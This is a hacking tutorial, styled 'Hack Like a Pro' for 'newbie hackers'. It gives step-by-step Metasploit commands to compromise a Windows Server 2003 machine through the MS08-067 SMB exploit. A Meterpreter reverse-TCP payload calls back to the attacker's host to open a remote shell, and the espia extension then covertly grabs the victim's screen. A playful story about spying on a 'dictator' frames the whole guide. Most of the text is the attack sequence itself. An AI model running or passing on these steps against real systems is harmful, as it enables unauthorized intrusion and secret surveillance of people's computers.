Hack Like a Pro: How to Remotely Grab a Screenshot of Someone's Compromised Computer
Welcome back, my newbie hackers!
We need to keep a close eye on him, so in this hack, we'll install a script to periodically take a screenshot of whatever he's doing on his computer. That way we can monitor his activities and hopefully keep the world safe.
So, let's fire up Metasploit and get after this malignant, maniacal, and malicious dictator.
First , let's select an exploit to use. Since he's using a Windows Server 2003 system, I like to use the MS08_067_ netapi exploit, so let's type:
- msf > use exploit/windows/smb/ms08_067_netapi
To simplify our screen captures, we'll need to use Metasploit's Meterpreter payload. Let's load it into our exploit by:
- msf > (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp
Next, we need to set our options. At this point, I like to use the "show options" command to see what options are necessary to run this hack.
- msf > (ms08_067_netapi) show options
As you can, we need to set the RHOST (the victim) and the LHOST (the attacker or us) IP addresses. After doing this, we should be ready to take over his system.
- msf > (ms08_067_netapi) set RHOST 192.168.1.108
- msf > (ms08_067_netapi) set LHOST 192.168.1.109
Now, if we did everything correctly, we should be able to exploit the dictator's computer and put the Meterpreter on it, giving us total control of his computer.
- msf > (ms08_067_netapi) exploit
As you can see, we received a Meterpreter command prompt and we're ready to roll!
Before we begin work on the malicious dictator's computer, let's find out what process ID (PID) we are using. Type:
- meterpreter > getpid
As you can see from the screenshot, we are using the PID of 932 on the dictator's computer. Now let's check to see what process that is by getting a list of all the processes with their corresponding PIDs. Type:
- meterpreter > ps
We can see that the PID of 932 corresponds to the svrhost.exe process. Since we're using a process with active desktop permissions, we're good to go. If not, we would have to migrate to a process with active desktop permissions.
Now all we need to do is activate a built-in script in Meterpreter called espia. Simply type:
- meterpreter > use espia
Running this script simply installs espia on the bad guy's computer. Now we need to grab a screenshot of his computer by typing:
- meterpreter > screengrab
When we do this, the espia script grabs a screenshot of our dictator's computer, saves it in our root user's directory, and displays a copy for us.
As we can see above, we've successfully grabbed a screenshot of our bad boy's computer. Looks like he's up to no good again, checking on those Twinkies that are enroute.